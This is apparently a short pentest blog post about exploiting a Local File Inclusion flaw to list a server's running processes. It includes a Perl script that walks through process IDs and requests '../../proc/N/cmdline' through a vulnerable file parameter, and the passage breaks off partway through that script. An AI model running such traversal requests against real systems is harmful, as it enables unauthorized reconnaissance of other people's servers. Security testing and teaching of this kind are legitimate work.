Process command line enumeration using LFI



This week during a pentest I discovered a website vulnerable to Local File Inclusion vulnerability. As I wanted to discover the most information possible about the system I decided to retrieve the running process and the command line used to execute these programs. With this I pretended to discover more services and paths in the system.

I wrote a very simple Perl program that can be modified very easily to other scenarios 

#!/usr/bin/perl -w
use LWP;
my $browser = LWP::UserAgent->new;
my $url = 'https://URL/load?file=../../proc/';
for($i = 0; $i < 9500; $i++){
my $response = $browser->get( $url.$i."/cmdline" );
if($response->content !~ m/^$/i) {
print $i . " : " . $response->content ."n";